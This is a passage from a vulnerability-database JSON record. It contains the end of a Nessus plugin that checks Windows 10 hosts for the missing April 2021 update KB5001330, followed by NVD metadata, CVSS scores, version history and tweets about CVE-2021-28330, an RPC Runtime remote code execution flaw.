script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27092\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin, kbs, share;\n\nbulletin = 'MS21-04';\nkbs = make_list(\n '5001330'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'04_2021',\n bulletin:bulletin,\n rollup_kb_list:[5001330])\n)\n\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released KB5001330 to address this issue.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-27092", "vpr": {"risk factor": "Critical", "score": "9.2"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2021-04-13T00:00:00", "vulnerabilityPublicationDate": "2021-04-13T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.nessus.NessusBulletin", "robots.models.base.Bulletin"]}], "cve": [{"id": "CVE-2021-28330", "bulletinFamily": "NVD", "title": "CVE-2021-28330", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "published": "2021-04-13T20:15:00", "modified": "2021-04-19T20:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28330", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28330"], "cvelist": ["CVE-2021-28330"], "immutableFields": [], "type": "cve", "lastseen": "2021-04-28T11:49:17", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "20h2"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "20h2"}], "bulletinFamily": "NVD", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2021-28330"], "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cwe": ["NVD-CWE-noinfo"], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-04-20T09:36:35", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28330"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-20T09:36:35", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 25, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220371822399501", "text": " NEW: CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/CgRDSKukiq?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371813998596", "text": " NEW: CVE-2021-28342 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/fEwWVr44Rb?amp=1"}, {"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}, {"link": "https://twitter.com/threatintelctr/status/1384220371822419992", "text": " NEW: CVE-2021-28344 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/2ogBljwZsG?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371679809544", "text": " NEW: CVE-2021-28343 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/ZiHFI8SGR7?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371650453516", "text": " NEW: CVE-2021-28341 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/Aw1lXDpd8E?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371923005445", "text": " NEW: CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/m75DrxLvYi?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976188338179", "text": " NEW: CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/YFoUz5lTjW?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371746914307", "text": " NEW: CVE-2021-28339 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/oeqb8wsiKw?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220372086661125", "text": " NEW: CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/cYXOmXTAuK?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28330", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28330"}], "hash": "027dfc8ff411a8a482257a3a302ac8a3389efbc8da52aa9ca7965654de8cbeb1", "hashmap": [{"hash": "d8397aaca09c3d41cbbd37f93b216f7e", "key": "cpe23"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "3c07c02ed39ae47a3b546d9a4c424c8c", "key": "extraReferences"}, {"hash": "e33b6131de3e5db7dabb6bb398d863af", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "0187fd86f792b6c1e0077d0f69d0ed79", "key": "cvss"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "8bc02899e794936205ad4624a78ce0e4", "key": "description"}, {"hash": "707ad39bddbe6ba132c89e77b001cb5b", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d5b812c11bd119f970b8a32c5b252c9e", "key": "affectedSoftware"}, {"hash": "56dd3b90fdad5434b2e237c2d2c62919", "key": "cpeConfiguration"}, {"hash": "3bf2877e19b91d4143ea460e43ce9041", "key": "cvss2"}, {"hash": "d9350890cd680da362af203c5f22bcc7", "key": "modified"}, {"hash": "d370d473ba1bd1721d669ef98e2aeebb", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "122bdba5509c507afa2962a93b3d1c93", "key": "cpe"}, {"hash": "9e11ed7fde26d443d1729fc840b7c70e", "key": "title"}, {"hash": "797434013b6a54d859a5263bc756e7a6", "key": "cvss3"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "2fe1c8439365b62069cf8a4873f660ff", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28330", "id": "CVE-2021-28330", "immutableFields": [], "lastseen": "2021-04-20T09:36:35", "modified": "2021-04-19T20:00:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28330"], "reporter": "cve@mitre.org", "title": "CVE-2021-28330", "type": "cve", "viewCount": 1}, "different_elements": ["reporter", "cpeConfiguration"], "edition": 2, "lastseen": "2021-04-20T09:36:35"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-28330"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337, CVE-2021-28338, CVE-2021-28339, CVE-2021-28340, CVE-2021-28341, CVE-2021-28342, CVE-2021-28343, CVE-2021-28344, CVE-2021-28345, CVE-2021-28346, CVE-2021-28352, CVE-2021-28353, CVE-2021-28354, CVE-2021-28355, CVE-2021-28356, CVE-2021-28357, CVE-2021-28358, CVE-2021-28434.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-04-14T11:37:54", "references": [{"idList": ["SMB_NT_MS21_APR_5001337.NASL", "SMB_NT_MS21_APR_5001347.NASL", "SMB_NT_MS21_APR_5001387.NASL", "SMB_NT_MS21_APR_5001382.NASL", "SMB_NT_MS21_APR_5001389.NASL", "SMB_NT_MS21_APR_5001339.NASL", "SMB_NT_MS21_APR_5001342.NASL", "SMB_NT_MS21_APR_5001335.NASL", "SMB_NT_MS21_APR_5001340.NASL"], "type": "nessus"}, {"idList": ["RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26"], "type": "rapid7blog"}, {"idList": ["MS:CVE-2021-28330"], "type": "mscve"}], "rev": 2}, "score": {"modified": "2021-04-14T11:37:54", "rev": 2, "value": 3.5, "vector": "NONE"}, "twitter": {"counter": 25, "modified": "2021-04-14T11:37:54", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1384220371822399501", "text": " NEW: CVE-2021-28345 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/CgRDSKukiq?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371813998596", "text": " NEW: CVE-2021-28342 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/fEwWVr44Rb?amp=1"}, {"link": "https://twitter.com/circl_lu/status/1383701644915798019", "text": "Still wondering why packet filtering is important for Remote Procedure Call ports? \n\nhttps://t.co/yQU6IUH5MC?amp=1 and CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, CVE-2021-28334, CVE-2021-28335, CVE-2021-28336, CVE-2021-28337..."}, {"link": "https://twitter.com/threatintelctr/status/1384220371822419992", "text": " NEW: CVE-2021-28344 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/2ogBljwZsG?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371679809544", "text": " NEW: CVE-2021-28343 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/ZiHFI8SGR7?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371650453516", "text": " NEW: CVE-2021-28341 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/Aw1lXDpd8E?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371923005445", "text": " NEW: CVE-2021-28338 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/m75DrxLvYi?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1383170976188338179", "text": " NEW: CVE-2021-28355 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/YFoUz5lTjW?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220371746914307", "text": " NEW: CVE-2021-28339 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/oeqb8wsiKw?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1384220372086661125", "text": " NEW: CVE-2021-28340 Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28327, CVE-2021-28329, CVE-2021-28330, CVE-2021-28331, CVE-2021-28332, CVE-2021-28333, C... (click for more) Severity: HIGH https://t.co/cYXOmXTAuK?amp=1"}]}}, "extraReferences": [{"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28330", "refsource": "MISC", "tags": [], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28330"}], "hash": "3b0fdc38a0e4ffa29a8b316244a827d2b5a01786932a04caccb303721d8bd6ea", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "e33b6131de3e5db7dabb6bb398d863af", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "466c447b6119a8be9494fae20b17c9a1", "key": "published"}, {"hash": "8bc02899e794936205ad4624a78ce0e4", "key": "description"}, {"hash": "707ad39bddbe6ba132c89e77b001cb5b", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "a181321bea47c429587f8596b033a42a", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9e11ed7fde26d443d1729fc840b7c70e", "key": "title"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "40c747f3c7fe2582f50d51b1b5116564", "key": "modified"}, {"hash": "2fe1c8439365b62069cf8a4873f660ff", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28330", "id": "CVE-2021-28330", "immutableFields": [], "lastseen": "2021-04-14T11:37:54", "modified": "2021-04-13T20:35:00", "objectVersion": "1.5", "published": "2021-04-13T20:15:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28330"], "reporter": "cve@mitre.org", "title": "CVE-2021-28330", "type": "cve", "viewCount": 1}, "different_elements": ["extraReferences", "cpe23", "cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 1, "lastseen": "2021-04-14T11:37:54"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "d5b812c11bd119f970b8a32c5b252c9e"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "122bdba5509c507afa2962a93b3d1c93"}, {"key": "cpe23", "hash": "d8397aaca09c3d41cbbd37f93b216f7e"}, {"key": "cpeConfiguration", "hash": "64c56abb30602eab96958881fd107551"}, {"key": "cvelist", "hash": "2fe1c8439365b62069cf8a4873f660ff"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "3bf2877e19b91d4143ea460e43ce9041"}, {"key": "cvss3", "hash": "797434013b6a54d859a5263bc756e7a6"}, {"key": "cwe", "hash": "d370d473ba1bd1721d669ef98e2aeebb"}, {"key": "description", "hash": "8bc02899e794936205ad4624a78ce0e4"}, {"key": "extraReferences", "hash": "3c07c02ed39ae47a3b546d9a4c424c8c"}, {"key": "href", "hash": "e33b6131de3e5db7dabb6bb398d863af"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d9350890cd680da362af203c5f22bcc7"}, {"key": "published", "hash": "466c447b6119a8be9494fae20b17c9a1"}, {"key": "references", "hash": 